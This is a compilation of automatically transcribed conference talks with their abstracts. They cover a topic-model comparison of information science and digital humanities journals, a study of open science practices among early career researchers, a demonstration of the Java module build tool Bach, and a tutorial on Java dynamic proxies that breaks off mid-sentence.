stabilized topic model originally proposed by Wege Karasco et al. in 2020. It evolves in a first step determining an appropriate number of topics, then in a second step running LDA a number of times, in our case 20 times, using this number of topics, and in the end merging all resulting topics into one stabilized topic model using hierarchical agglomerative clustering on distances of topics term probability distributions. Each step is evaluated using four evaluation metrics, the propensity, topic coherence, topic stability, and topic distinctiveness. And as mentioned, the number of articles per journal and decade vary a lot in our corpus. Therefore we performed each of the 20 LDA runs on a new stratified random subsample of our corpus to ensure that each discipline in decade has an equal impact on the results. Each subsample is made up of 2,400 articles stratified by decade discipline in general. At the end of this process we have a clustered topic model which only consists of topics which appeared across multiple runs of LDA, each of which was fitted on a different random corpus subsample. If you'd like to know how this works technically, we would like to refer the original proposal by Wege Karrasco et al. and also to our paper in which we describe everything in more detail. And now back to Manuel, who will present our interpretation of the final topic model. Thank you. Okay, it's my pleasure to summarize some of our main results that we were able to derive from the clustered topic model that Jan just introduced. After the whole process we are left with a final aggregated model that features 87 topics. And this plot here shows an overview of the distribution of the mean topic probability among information science and digital humanities. The topics here are sorted by relative difference between the discipline specific probability. On the left and right side the plot clearly shows that there are a number of topic clusters that are rather characteristic for either information science or either digital humanities. So here we can already see that there seem to be characteristic topics for both disciplines as well as some shared topics which are to be found in the middle of this plot. This next plot here shows a spatial overview of the overall topic space of the 87 topics. And what you see here is a new map to the projection of the topic distances based on the transposed document topic probability matrix. And what you see here are 87 topics. The bubble size here reflects the overall average topic probability, so the bigger, the higher the probability of the topic. The color of the topic indicates whether they show a statistically significant higher probability for either DH or either information science. So blueish is information science, red-brownish is digital humanities. And the position of the topics in this 2D projection indicates co-occurrence with other topics in the corpus. So based on this position information in the plot we can now manually annotate clusters of topics to identify larger topic areas. And interestingly there seem to emerge larger clusters for both information science and digital humanities, which you can see here. So typical topic areas for information science seem to be information retrieval, cytometrics and citation studies as well as information seeking behavior and user studies. The HR however seems to be more focused on the topic area of distant reading and digital editions as well as on a cluster which we labeled computational linguistics and corpus linguistics. Let me note that there are also as you can see here a number of singular topics that are rather unique for either information science or digital humanities. For instance, hypertext or knowledge management are two very blueish topics for information science whereas multimodal and games are two topic bubbles that are more characteristic for digital humanities. As we are a bit short on time here in this presentation I won't have enough time to talk about the details of all these single topics but they are listed in the paper and just take a look there to find out more about these singular topics. Okay, I would like to now I would like to zoom in to one of those topics that are typically associated with information science, the topic cluster or the topic area of information retrieval. And I want to highlight why this is actually more closely related to information science than to digital humanities as one might expect that typical techniques from information retrieval might also occur in digital humanities. However, looking at the single topics here it becomes obvious that information retrieval really deals with fundamental topics that are relevant to information science. So fundamental IR topics such as classification, taxonomies, document representation, the sorry indexing techniques, etc. If we also take a closer look at a typical DH topic, the distant reading and digital editions topic, it becomes evident that these are very specific topics for DH indeed that don't typically bother people from information science. So this cluster here is very much focused on literary studies, computational literary studies, which means that both the annotation and modeling of literary works by means of TI and XML as well as their computational analysis by means of stylometry and other methods are typically subject of the topics to be found here. So why we have seen that both information science and digital humanities have very specific methods, there are also some shared topics mostly on the methodological and conceptual level. So on the methods level you see that we find machine learning algorithms for pattern recognition and information extraction. We see statistical tests but also techniques for network analysis and topic modeling. We also have a few overlaps on the conceptual level. So for example, both disciplines seem to deal with modeling practices and epistemological theory and there are further singular shared topics to be found on the level of resources I would say, for example digitization and new media, software systems and frameworks, but also institutions like information institutions and the overall topic of information literacy. So to sum up our results, the chest that the generally expected overlap between information science and digital humanities seems to be mostly on the methodological and conceptual level and all in all our results indicate that despite rather occasional overlaps there is still enough uncontested space for both information science and the digital humanities to thrive as individual disciplines and to further develop unique research agendas and study programs. So what's next? Well I think most of you have already realized that one of the core topics of digital humanities, namely computational linguistics, is of course also a subfield of its own. So although we were able to kind of show that the age and information science can be distinguished from each other fairly well, this here opens the question whether the age instead largely borrows from other disciplines, like for example computational linguistics. And that's what we look into right now. So in order to investigate the relationship of the age to computational linguistics and many other disciplines, we are currently working on a multidisciplinary, centometric study that takes a closer look at this. And well as you can see here, this plot here already confirms that the age seems to be pretty comfortable sitting between information science and computational linguistics and also to a certain degree literary studies. So if you're interested in this topic, stay tuned for upcoming publications featuring this plot and many other interesting insights. And as I think the time is up by now, I want to thank you for listening and we are looking very much forward to the discussion.
In this paper we investigate the relationship of information science (IS) and the digital humanities (DH) by means of a scientometric comparison of academic journals from the respective disciplines. In order to identify scholarly practices for both disciplines, we apply a recent variant of LDA topic modeling that makes use of additional hierarchical clustering. The results reveal the existence of characteristic topic areas for both IS (information retrieval, information seeking behavior, scientometrics) and DH (computational linguistics, distant reading and digital editions) that can be used to distinguish them as disciplines in their own right. However, there is also a larger shared area of practices related to information management and also a few shared topic clusters that indicate a common ground for – mostly methodological – exchange between the two disciplines.
10.5446/52976 (DOI)
We'll do it in English because I have English slides and later on we can switch in Germany. Yeah, thank you very much. I will do a quick report, hopefully, on the project that was funded by the LiveNESS Research Alliance, Open Science, which I did together with my colleague Ina Blümel from the TEB Hannover and Lambert Heller as well. And it is on open practices of early career researchers in educational sciences. And it is a qualitative study. And I will shortly introduce what we mean with open practices in research and education, come to the research goal and questions, and introduce the study design and our target group, and then show preliminary results on the qualitative analysis. So first, to make it clear, we refer to practices at this study as practices you do in your daily life related to any research or teaching context. And with regard to open science practices, you might have heard of terms like open access, open source, or open data. Those ideas are associated with potentials that arise with technical innovations. And after the printing press, the Web 2.0 was said to bring the second scientific revolution that would change research practices due to the fact we now have different options to communicate and to collaborate in a digital space. And Nielsen talks about the network science. And similarly, open educational practices are associated with technical innovations as well. A prominent idea is that of opening license and freely available learning material, or we are, you heard it in the morning talk, from Sylvia Kuhlmann. And one definition of practices is that they include not only our use and creation, but as well kind of open pedagogics, or collaboration, and communication within teaching contexts. And the goals of open science and open educational practices are similar, and again show a strong connotation with regard to digital tools and spaces. And we talk about digital access to resources, transparency, other reuse and sharing of resources. And of course, participation is a crucial aspect in both concepts. And this again relates to the situation where people share and use information, and where they use digital resources and tools. And those are aspects that are investigated within human information behavior. And one goal here is as Steiner-Rober formulated in her study to investigate human behavior for the designing of value-added information services, systems, and products for researchers. And my colleague and I both worked at an information infrastructure center where we have similar goals. And our study was mainly driven by the knowledge that people support open practices, but do not practice it. And I will cite one study here, a recent survey among PhD students at the Marx-Planck Society. There are many other studies which have similar results. And the survey asks about 560 PhD students on their attitudes towards and awareness of open science practices and their intentions to apply those. And you can see, as in other studies, that the attitudes are positive and many early career researchers are aware of open science practices. They do not practice them commonly. It's not a default yet, but the intentions are high. But in January, you can see that there's still a gap between the attitude towards open science and practices. And of course, it has to be mentioned that differs among the different disciplines and subjects we have in research. So the research question I talk about here in this talk will are, which open practices did early career researchers choose to test and for which reasons and which experiences did they make? We wanted to have a participatory approach and not kind of determine open practices and let participants do them. But we let participants choose open practices themselves. And they should apply them in their daily life in research on teaching contexts. And then we let them reflect on their application and experiences. And on the right hand side, you see the study sign, the main steps where we had an interview first, a single interview with participants, then a workshop we had together. And then the participants choose their scenarios, their open practices, and the diary entries. And we've reported back on their experiences to us, either in text or in audio. We had a second interview with each participant and a final due to Corona Online workshop. And we had two phases of the study because in the first recruiting phase, we did not find many participants, some skipped, and did not attend the physical workshop here in Frankfurt. And I will report on the results of the inductive coding, mainly here on the coding of the interviews and the diary entries. Shout out to the target group, though we did decide for early career researchers in the broad field of educational sciences. And on the right hand side, you can see the field of research. They have different backgrounds within educational sciences. And we defined early career researchers as PhD candidates or postdoc with a low academic age. You can see we mostly had postdocs. The three PhD candidates did not attend the whole study due to job changes and so on. And via this group, interesting, there are some studies or research that discusses if maybe the early career researchers are the herringers of change in research practices. And there might be more aware of digital technologies and might be willing to apply those. However, as we all know, the early career researchers need to decide whether to apply accepted practices to get better reputation within their fields and to expand their research network or to apply new open practices. So we had 10 participants in the study. And I will now show the results on the first research question, which open practices did they choose to test and for which reason? And we mainly found four reasons, which are summarized here. So motivational goals are, for example, to be more independent with open tools and not be dependent in proprietary software, allow for better outreach and transparency of workflows that was mainly in the research context, then improve students' communication and collaboration literacy. That was an educational context and improve collaboration and communication amongst colleagues and different groups of peers within and intent extent, their research field. And on the right hand side, you'll see the Cholson scenarios. I wrote down here either within the application of a specific tool, an online tool like CripPad, for example, or there are kind of learning or teaching scenarios or other scenarios like opening to an established and open science discussion group or design a student course hour or flipped classroom, for example. So then I come to the second question, which experiences did the participants make with those Cholson scenarios? And I will summarize here three main points. One was, and this was very prominent, of course, the usefulness and the ease of use of the applied tools. The ease of use is, for example, concerned with user friendliness and tool functions, where the participants experienced some barriers and could not use the tools as they intended to do. For example, the students, in one case, did not have an upload function. And the main goal was to have a collaborative space where they discuss their results and share those. And with regard to usefulness, I have two citations here from participants. For example, participant nine reports that students did not see the necessity to create and share literature. Commonly, thus, they were not engaged to use the tool, in this case, so terror the open source reference management system. And another experience is that unpayable does not have any benefit compared to other search tools, like, for example, Google Scholar or Research Gate. So the usefulness was very prominent. And that's a factor which could still be improved with the digital tools. Another one where the reflections and reasonings with regard to other people involved in the open practice context. For example, there were barriers with regard to competencies as participant three experience. He wanted to use an online pet. And he said, we switch to rich text instead of code, although he would have preferred code to make it more reusable. But he said it's easier for everyone. And it was a research group. And they had to come to compromise in this practice. And another example is a kind of what I described, reservation or kind of not reluctant about reservation and using new tools. And participant two said, in the first weeks, it was difficult to persuade colleagues to use the tool. And later on, he reported, they could not access the pet. They had a small issue with the access. And then everyone got very frustrated. So they switched to word immediately. So this, again, is as well a kind of usefulness, maybe the ease of use. However, he was not sure that it's only the technical issue with the pet. But he said it was more like the people that his peers were not used to this tool. And there are some other examples in this category, which was very prominent as well. And I described this motivation and benefits. One example that's similar to the one before is that people do not use the new tools. Participant three wanted to introduce RocketChat as it would be more efficient in small communications, more efficient than the email. And he was very careful and gave instructions. He wrote a kind of short document where he explained what RocketChat is, which function it had, and also reported on the data privacy issue. And it was an internal university installment. So he was very careful and seeked help and was supported by the IT. But again, while using the tool, he reported 10% are active, 10% of the quite larger was a larger diverse research group. In this case, 10% are active, 60 are lurking, and the rest only signed in. So he was a bit sad at the end that just a few people really used what in his case was a useful tool. Another example from the teaching context, from participant nine, was that the student groups could write down the results in an online pet led. They did not do it voluntarily. And that was very frustrating for the teacher. And at the end, she reasoned that she kind of needed to activate the intrinsic motivation of students to do open practices. But she didn't find or she isn't sure how to do it properly. And another reporter with regard to the benefits, very similar and participant one said, I conclude to teach collaborative note taking properly as students have no experience and do not see the benefits of the specters. So this is an example where the open tool was easy to use and the students liked it. But the barriers rather within the teaching, with teaching the concept and benefits of collaborative open work tasks. Of course, they were all self-critical as well the participants. And the two statements here are that participant nine was very engaged in open practices within teaching said takes discipline to continue and not to reduce didactics to a minimum which sometimes works better. And let's skip the last one and come to the final slide to the conclusion. So the usefulness of tools and technical infrastructure still needs to be improved. There were many issues here, still many issues. For one funny example is that the engaged teacher had a course and it was before Corona. And the course room only had one black socket and the students had hard times to use their notebooks because they couldn't, they had low energy. And another conclusion is what a participant described with value alignment. So all involved people need to see the benefits of the new practices. Otherwise it's very they won't stay tuned to use them again. And just one sentence to the limitations. So the participants still have a positive attitude towards open science. They see some hurdles in the practices. And what we saw in the study is that one year is a bit too short to observe the practices because many participants did want to try more open practices and scenarios. But they just didn't have the chance within this year due to other obligations. OK, thank you very much.
Many researchers have a positive attitude towards open science and are motivated to apply them. However, applying them requires a change in one’s daily practices. Different factors might challenge a behavioral change. The introduced study wants to get deeper insights into the reasons and influences that lead early career researchers to apply open practices in their daily research and teaching work. The participatory design let ten participants choose open practices they wanted to learn and adapt in either research or teaching scenarios. The study accompanied them and collected their positive and challenging experiences via diverse methods like interviews, diary entries and workshops. This paper introduces the study design and preliminary results.
10.5446/52789 (DOI)
Hi, my name is Christian and I'm still working on Bach. Bach builds Java modules, Bach builds on Java modules and Bach builds only Java modules using Java only. The Java development kit contains a set of foundation tools like a compiler, an Rp doc generator, an archive manager and others. And most of the time the output of one tool is the input of one or more other tools. None of those tools guides us in one go from processing Java source files into shippable products, be it a standalone custom runtime image or modular Java files. There exists, however, an implicit workflow and code it into the options of those foundation tools. With the introduction of modules in Java 9, some structural parts of that workflow got promoted into the language itself as module descriptors. You can see two of those sketched over here. You have a module definition keyword and name of a module followed by a body of the module which contains directives. Here you see there is an org-astro module required by the module-concretings and the org-astro module is defined over here which exports a package called org-astro. If you think you have seen those module descriptors before, that's absolutely possible because I based them on the jigsaw quick start guide which I have over here in my integration tests. And if you want to brush up your modular experience, head over to this URL and read the guide again, or for the first time, it's never too late. Here you see the modules organized in directories named like the modules itself with a package underneath some classes and back to the overview because now we want to use this structural information and code it into the module descriptors and think about a project descriptor which could look for this project like this. The project descriptor you see here is a strawman syntax example of the internal project model Bach uses. It serves two goals here. In this case it should look very similar to a modular descriptor which has a keyword and the name, project name in this case and a project version which is defined here and some other directives. And the second goal is to assemble and collect all option parameters used by the various foundation tools later in the process in one single place. Based on the information found in a project descriptor Bach calls the appropriate foundation tools in the right order with the right arguments. Nothing more, nothing less. The generated tool calls could look like these. Here we go. We have a compiler call for two modules in one go. We package both tools one after another, create RP documentation and package those HTML files too. And last but not least compile a custom one-time image which uses the project name as the launcher. And to close this interaction let's run Bach on this project without the magnifying glass and using JShell which is strange. I'm going to cut this a bit shorter. So here we go. Here we see Bach was launched using JShell and a Lord script. And here it analyzed the structure of the project and called the foundation tools in the right order with the right arguments. Now let's see Bach in action. Last year I ran out of time showing you Gerrit's spacefx so let's see what he improved this year and let's rebuild this project with Bach. So let's open up his spacefx project, hostlet-github.com. And we see here he has a JDK15 branch which is almost up to date to the latest JDK because 16 is already being prepared now. It's in ramp down phase two. So let's use this one. I prepared a pull request to show Gerrit how Bach would be used. If you are interested you can browse this one and the commits I did to get it done but now without further ado, head over to the checkout version at my IDE. Here we go. The project is checked out. Let's examine it a bit. So we have sources and those are the shared sources for the different targets. It's Android, iOS and then whatever. And it always starts with a module. So let's look what this module is all about. It has a name, spacefx. It requires Java base which is mandated but you're allowed to write it down anyway. And we need four other modules from the JavaFx package. And the spacefx module exports the package from Han Solo Spacefx which is here. And the interesting part, at least for us, is the spacefx class which is a JavaFx application. You can see it down in the magnifying glass. And it contains a main method which does nothing else than passing the threat of control to the JavaFx framework. So I prepared this project by downloading the required JavaFx modules into a local package. Just making sure nothing magic is happening. So we've got a library, external modules, everything that's in this package here, the external module package is read by the spacefx module. So it will find the JavaFx modules for this platform which is Windows you might have already guessed. So let's launch the game from within the ID. Works great. We could now play, but no, not yet. So what do we have to do to make it run with Bach or build with Bach? First, Bach is smart enough to analyze the project structure by finding the module info files within the current directory tree. So we can just issue a Bach build command and Bach is now working on the modules called the compiler and created a modular Java file. So this is the basics. So far so good. Now let's change some basic properties of the project. This we're doing with creating a project info file which is not called project info, which is not yet supported by Java. Might never be. But there's a technique we can use here. It's a module info. So let's create one in a predefined folder and let's see what we can do with the project info. So we can define several things here and we start with the basic one. Name SFX because everything else is too long. Let's save it. Go to the shell and see our definition in the project info file, project info annotation has an effect. Next for the version. What does it expect? It's a string. Yeah, here we see. So it's fuzz them 21. Save, build, no. What happened here? The version was illegal because the version string does not start with a number. Who is complaining? The Java language module descriptor. The pass method in the version class. So there's nothing we can do about versions. Two versions have to start with a number. So that's easy. So let's turn this around and flip it here and then clear the screen and build again. That's better. So let's see if we can store this application into a standalone image. Defined here. It's a feature of Bach to generate a custom runtime image. Nice. Let's build it again and see. Well, there's a Jailing call with all modules included. So is it really happening? We can see with a simple check, which is we go into the just created image in the workspace. There's a bin directory and it has a Java, which we can tell to list all the modules that are in this image. You can see there are only some of them. And our spacefx module. But because of a small bug, it contains the wrong version information. So let's do it with a clean call and then build it again. And after some calculations are done, we can show that the right modules are included in the image. Now let's start. But spacefx, spacefx, it works. And to finish this, I have to copy as long as I want the custom runtime image with modules that are in the jailing call. Which is this class over here. Let's rebuild it. I'll see how there's a launcher tweak going on. It's over. It's... but also you need to shortcut... It's... Naive. It's time to play. For a short second, that's it. It's all the time. Let's take a look at a project that already uses Bach to build its modules. It's called Purgin, developed by Jan. And it's shared on GitHub. As you can see, there are a lot of modules defined in the root directory. And Jan also uses the GitHub Action to release a pre-release or early access version of Purgin at GitHub Releases. And you can see the modules, which you can download from here and see what Purgin does. But we're going to inspect how he configured Bach to build Purgin. So let's go back to the source code and see the Bach folder here. We have a build module directory and a project info Java file. And here we see how he sets the name for the project and the current version. Ah, one interesting thing is that he targets Java SE 8 and tweaks some of the foundation tool calls, namely Java C or Java Dark, and also using JUnit to test its modules. So let's build Purgin using Bach. And there's a short description over here. We have to install JDK after checking out the project, of course. And then we have to enter JShell and subsequent builds may be triggered running the platform dependent build script, which are stored within this project. You can see them over here. So I prepared the checkout already. Let's enter a JShell session. And which version are we using? Let's ask the Java runtime. R16 EA build 32. That's fine. And now let's build the project. Now it just worked because we have to load Bach. So we have to open it first and source it into this JShell session. We're going to open JShell script from GitHub. This repository, which is released as stable. Download it from here. Take this version 1601 and boot Bach in this version. Here we go. Repload it, Bach module downloaded and restarted. So now let's see. We have the shell environment imported from Bach and we can list the API provided by Bach. Here we go. And now we have the build command. We can trigger it and we see Bach loaded the project from the project info. And the build module called some Java C commands packaged the modules where JAR generated the API, API documentation and also compiled and executed the test modules. So far so good. Bach wrote all details into a logbook. Let's see what's in this logbook. And here we see Bach generated nine modules. We see the API of those modules here with their names version, which packages are exported and what services are provided and that no main class is contained within a module. We see the sizes of each jar and also the project descriptor that was generated by Bach based upon the module info Java files found within the directory and the project info annotation. The next section is the tool call overview. And here we see every detail of the arguments passed to the foundation tools. And there are a lot of details. Let's scroll over them and after packaging everything, Java doc is called and it ends with two J unit calls. And now just to verify everything is working with plain tool calls. Let's redo some commands on the command line with the post flag and we add the parameters copied from the logbook and we see everything is just working fine and as expected. So every other tool call the same. Here we see Java doc had emitted some warnings. Let's try to run this too. And here are the warnings so we can only call a single tool call, fix the warnings and don't have to repeat everything within the build. And last but not least also reports are generated running the unit tests. Here's the tree of all those tests with the summary almost 500 tests were executed successfully in less than a second. And this concludes this short introduction into Bach and let's have a look at the website. GitHub where Bach is hosted and I want you to discuss with me this tool over at the discussion page and maybe you are the first who opens a new thread here. So thanks for your time. Have fun and see you all.
Java build tools were developed before Java modules were around -- Bach builds (on(ly)) Java modules! The JDK contains a set of foundation tools 1 but none of them guides developers from processing Java source files into shippable products: be it a reusable modular JAR file with its API documentation or an entire custom (soon static 2) runtime image. There exists an implicit workflow encoded in the available options of the foundation tools. The (binary) output of one tool is the input of one or more tools. With the introduction of modules in Java 9 some structural parts of that workflow got a) promoted into the language itself and b) resulted in explicit module-related tool options. These structural information, encoded explicitly by developers in Java's module descriptors, can be used as basic building blocks when describing a modular Java project. I think of it as a "project-info.java" file -- which I don't propose to introduce (as a part of the language) -- but it helps to transport the basic idea.
10.5446/52794 (DOI)
Then I make proxies were added to the language in Java 1.3, which is over 20 years ago, to solve a problem that we had, which was whenever we used infrastructure code like RMI, some of the types of things, we would have to generate, go through a separate build process to generate stubs and skeletons so that we could access the remote objects. And this was a bit of a pain because if you forgot to call RMI C after changing the interface, then things wouldn't really work very well together. So Java 1.3, they added the single dynamic proxies, which allows you to create new objects of new classes that implement certain interfaces on the fly. And this made the whole infrastructure code much easier to do. And we can use them in our own code as well. With dynamic proxies, you've got a single invocation handler, which is called when any proxy method is called. So you can reduce the amount of code quite substantially that you have to write and maintain. And the biggest example, we took 600,000 code statement and replaced that with a single dynamic proxy. So it's a huge, huge win. And the code had not been written by hand. It had been generated. But after it was generated, then it had to be maintained by hand. Dynamic proxies are used a lot in different types of infrastructure code. 11 spring annotations, dependency injection, hibernate gradle. So we did a search through that. And it's used in lots of different places. And I've even written a book about it. So here's a book, you can get that for free from infacue.com slash mini box slash Java dynamic proxies. Before I show you how we can dynamically create proxies, I'm first going to show you how to not do it, how to do it by hand. The example I'm going to use is that of the virtual proxy. Now there are different forms of proxies. If you don't know what the design pattern proxies suggest, you look it up. But there are certain, there are different types of proxies. One of them is a virtual proxy where you create something on the mod. And if you look at my office here, my desk, my desk has got a virtual tidy up proxy. And when I've got, when I get visitors, I tidy up. But I'm for the visitors, I don't tidy up. So I sort of delay the tidying up until it's absolutely necessary. And my wife says, our visitors are coming tomorrow. They're going to see your office. And then I tidy up. So I mean, I'm delaying an expensive object creation, tidying up my office until the absolute last moment where I can get away with it. And it's always possible if the visitors say, we can't make it, in which case, I can wait for the next visitor to arrive, and then only tidy up my office. So the idea with the virtual proxies to delay expensive object creation until you absolutely need it on the mod. This is similar to the map interface. It's just a six method size, get put, remove, clear and for each. The custom hash map implements custom map and delegates to normal Java util hash map. So all six methods are delegated. I'm also in the constructor printing out custom hash map constructed, just so that we can see at what point it gets constructed. This code can be almost entirely generated by your IDE. And it continues, remove, clear for each two string. Now this is of course, repetitive and error prone because, well, if you did by hand, it's error prone. If the IDE does it, maybe it's not as error prone as you do it by hand, but still it's a pain. It's a pain to do coding like that. We'll get back to that in a moment. Now we also are going to do a virtual custom map. This is a virtual proxy, which creates the real custom map when it's used for the first time. So when our constructed virtual custom map are passing a supplier and the supplier is used to create a custom map. So I pass in a supplier that's stored inside a final field. And then I've also passed in a real map and the real map, sorry, I don't pass in a real map. I have a real map field and the real map field is set inside the get real map method. The get real map method is a private method that if the real map is set to null, it creates it on demand. The first time we call it. So I've got my six methods here, size get put, remove, clear for each. Each of them now delegate to the get real map method. And the get real map will be, will set the map the first time that I call it and then create it. This is what the client code could look like. I would make a virtual custom map passing in a custom hash map constructor as a method reference. And then as soon as I start using it, you're going to see in the output that the custom hash map was created. So you see exactly at which point it gets created. After that, it's available and we can use it. And if you ever use it, then it also doesn't cost us anything. So that's one of the beauties of this pattern is expensive objects don't have to be constructed up front. We can only, we can do it only once we absolutely need it. Like Heinz tidying up his office only has to happen when I've got visitors, if I'm the visitors, well, then it doesn't matter. In my opinion. Nobody can see my mess. So I'll leave it like it is until the visitor comes. And at the current time with coronavirus, visitors are scarce. So my office is getting worse and worse and big mountains of cables and devices lying on my desk. You can probably relate to that. Now we've seen how to do it by hand. Let's see how we can do this with a dynamic proxy. And we want to avoid as much as possible either copying post programming because when you make a mistake, it gets copied everywhere. Secondly, we also want to avoid generating code with the IDE because well, it's it's just to maintain the code by hand. And if you make a change, you've got to make change, you've got to make you've got to change multiple places. And that's another problem with with that type of coding. So a better approach is either do static or dynamic code generation. And we're going to focus on the dynamic code generation. The method we call is proxy dot new proxy instance. And what this does is it takes three parameters. First of all, the class loader where the new proxy class is going to be loaded into once it's created, then an array containing all the interfaces that our proxy must implement. And then lastly, an invocation handler that is called when a proxy method is invoked. So these three. And we'll talk a bit more about the different constraints on these different classes. The invocation handler is called when any method is called on the proxy. It takes three parameters. The first parameter is the actual proxy object that on which methods were invoked. Then we've got method which is Java lang reflect method. I'll show you how that gets figured out in a moment. And then the arguments that were sent into that method. And that will be null if your method doesn't take any arguments. You also notice that we return objects so we can return anything. And the method throws throwable so we can throw anything as well. But it does have to match otherwise we get problems later on. For our example, we'll have a look at logging information on method calls. The logging of a cache handler is invocation handler that's going to be called when any method is called on the proxy object. So and we're going to optionally measure also the time that each method called tags. So the the log is off, you know what the log is, it's a logger, but then the object is the object on which we must invoke the methods. Here's the invoke method. Log.info, information about the method and the parameters. And then if we've got fine level enabled, we're also going to log the time, the nanotime. I've made it optional on and off because nanotime is a fairly expensive method to call. So we don't want to call it unnecessarily. And then we call return method.invoke with the object command and lastly we measure the time at the end and printouts also the time and the exiting of the method. So see all this information. There is a mistake in this code and I've left it in there deliberately. If you can spot the mistake, good for you. If you can't, well you'll have to wait, but there's a mistake. So here you've got your two string method and the two string method is just there to format the method nice. As you can see the methods class and the class of the method and the method itself and the arguments that get passed in. Here's how we could use it. We could say proxy.newproxy instance and for the class loader, the class loader has to be able to see the interface which we're going to be proxying. So if I'm using map, job with the map, I can use maps class loader. If I'm using one of my own interfaces, I need to use my own class loader. I can't use the bootstrap class loader to load the class. Then I pass in the logging and vocation handle as well and we're going to log the concurrent hash map. So then when I call methods like put, you'll see entering and the time and exiting and there we go. In order to see how this works, it helps to take, to create the dynamic proxy and look at the generated code. We can do that by taking another interface, isodate parser and what this isodate parser does, it takes a string and it returns a local date, a job utl time, which of a time API, local date and that throws parse exception. So if you, if it can't parse it, it throws a parse exception. That's a checked exception. Now when I, when I create a proxy with proxy, new proxy instance, if I, because it's my own interface, I can't use the bootstrap class loader. So typically what I do is I use the same class loader as the interface that I'm trying to proxy. So it's the isodate parser's class loader and the vocation handler just returns null. So if you call any method, it's going to not really work very well. But what I want to see with this class or with this object is what is the actual class, the get class. And you can see, for example, it could be com.sun.proxy.$proxy0. It doesn't have to be, but it's normal following something like that as a pattern. $proxy0. Something, something $proxy0. It's like an anonymous class. And we can actually dump these to the, to the file system when we run our code. So if you want to know whether your, whether your system is using dynamic proxies, you can just dump all the generated proxies. You can look at them and see exactly what has been proxy. And so here the settings for Java 9 and earlier versions on how to save the generated files. And then we can decompile them with a tool, tool like CFR. That's my favorite at the moment for decompiling Java classes. And this is what is generated. It's a public final class $proxy0. So it's final. We cannot extend it further. It extends proxy, which means it's a class that extends the Java lang reflect proxy. And therefore we can't extend other classes because Java does not support multiple class inheritance because it doesn't support multiple class inheritance. We also cannot support, we cannot proxy class. We can only proxy interfaces. And, and it implements ISO date parser. So it is an ISO date parser as well. Then it contains four methods fields. And the method fields are Java lang reflect method, m0, m1, m2, m3. And it then loads, it finds the methods for these classes. I think inside attorney, it actually does class.for name. But with the current class load, I guess. And then, but I just, I just decided to just to make it easy to show on the slide, I'm saying object.class.getMethod hash code. And object.class.getMethod equals comma object.class. And then string with odd parameters and parse, which takes a string parameter. And if any of those methods doesn't exist, we throw no such method error. So this is part of the, when the class is loaded for the first time, these method fields are discovered and stored inside the dollar proxy zero. And then we see the constructor, which takes an invocation handle as a parameter, and just pass it up to the superclass. And we can access it directly from inside dollar proxy zero. And then here's the hash code function, hash code, calls h, which is our invocation handler, dot invoke, this, which is the current proxy, comma the method m0, comma, because it's there no parameters for hash code, we pass null up to the invocation handler, but we cast it an object array. So it's clear what actually, what that is. Otherwise, you might think it's a, it's, it's, it's, it's actually a null argument that's being passed. But no, it's object array of null. And if a runtime exception occurs, or an error occurs, we simply re-throw those. If any other exception occurs, then we have to wrap that with an undeclared throwable exception. And then lies the problem with the logging invocation handler. Because what could happen is an invocation target exception, and in that case, we actually would rather throw the calls than the actual invocation target exception. Right, we'll get back to that in a moment. Then equals looks almost the same as hash code, except that we are also passing the parameter o to the invocation handler, and that is being wrapped as an object array. That object array might be eliminated, but not necessarily. Then we've got the two string method, which is almost exactly, almost exactly the same as hash code. So I'll skip that. And the parse method, which takes the string and returns a local date. Again, you have to cast the results to local date, because h.invoic returns an object. And then we, the other little difference is that this method declares that it throws parse exception. So we'll catch that together with runtime exception and error, and simply re-throw it. And anything else, we're going to throw them as undeclared throwable exceptions. All the methods are final, the class itself is final. We cannot extend it further. Let's see how we can create our own virtual dynamic proxy using this technique. So here's our virtual proxy handler. And the virtual proxy handler is an invocation handler, and I've also made it serializable. I'm not sure how this is going to be used. So rather safe than sorry, proxy objects themselves are already serializable, but the invocation handers also have to be serializable. And I've got a supply inside. I've got a subject inside. And the get subject method, similarly to the handwritten invocation proxy, the handwritten virtual proxy, is going to construct the actual subject on demand when you call it for the quality method for the first time. So it says if subject is null, then set subject equal to supply.get, and then return the subject. And then inside the invoke, this gets called when any method is called on the interface, or hash code equals in two string, as we saw in the previous section. And so in that case, we simply say method.envoke on the subject, the get subject, which will lazily create the actual subject, comma, the arguments. And I've got a class called proxies inside my book described in there. So get the book if you haven't got it yet, and you'll see more information there. And the virtual proxy method calls cast proxy, which passes in, we pass the interface and a virtual proxy handler. And the cast proxy does three different things. The first is very obvious, it does a cast, it casts to the correct type. The second one is a bit more subtle. It also will unwrap an invocation target exception and throw the course. So if you're doing any reflection, it would unwrap the invocation target exception past the course, throw the course rather than the invocation target exception. And the third thing it does is it speeds up the method calls. Instead of handwriting our custom hash map virtual proxy, we can instead just say proxy dot virtual proxy, passing in the interface, which is custom map, and the supplier of the custom hash map, which would just be custom hash map, colon, colon, new method reference. The rest of the code is exactly the same. So this is great, lot less code and less chance of bugs, the less code you've got, the less opportunity you have for making mistakes. And everything works exactly like it did before. Dynamic proxies have some restrictions. For example, you can only proxy interfaces. We saw already that our proxy class extends Java language reflect proxy. There's no multiple class inheritance in Java, so we can't proxy classes. If you need to do that, you need to use another library like cdlib or byte buddy. But I personally don't like using those class, those tools in production code. I don't mind for test code, but I don't like using it for production code. Then, as I mentioned to you, the undeclared throwable exception, an invocation target throws throwable. But if we throw an exception, which wasn't declared as part of the method signature, then it's going to rethrow an undeclared throwable exception. For example, here inside my runnable, dynamic proxy, I'm throwing a bad exception, IO exception. Of course, runnable doesn't expect to be throwing an IO exception. So what comes back is an undeclared throwable exception that contains an IO exception. So this is something to be aware of if you get the wrong exception, if you throw the wrong exception, you're going to have a bit of an issue there. Also, the return types need to match the method signature. So if I've got void, I can return anything. But if it's a primitive, it has to be that type, it can't be null. And if it's not a primitive, it has to be the correct type, because there's going to be some casting happening inside the proxy class, and that's going to give a class cast exception if it's wrong. These proxies are called potentially billions of times, because it's part of infrastructure code. And so it's important that it's quite fast. And there's a few places where performance might suffer. First of all, with primitive types being boxed, both as parameters and as return values. Secondly, parameter lists might have to be wrapped with object arrays. In some cases, these can be eliminated as part of your escape analysis, but not always. If they somehow escape from the method, or for escape analysis, cannot determine precisely that it can eliminate it, then it's going to still have the allocation cost. The third thing is that when you call the method by reflection, it always has to check whether you've got the permission to do that. It's like you call it and it says, who are you? They go, well, I'm Heinz. Oh, okay, yeah, you can call the method. And then you call it again, and it says, excuse me, who are you? And you say, I'm Heinz. And they go, oh, okay, sorry, yeah, okay, you can call it. And then you call it a third time and it says, who are you? And they go, come on, seriously. You know, this is not, this is some mental decline inside the 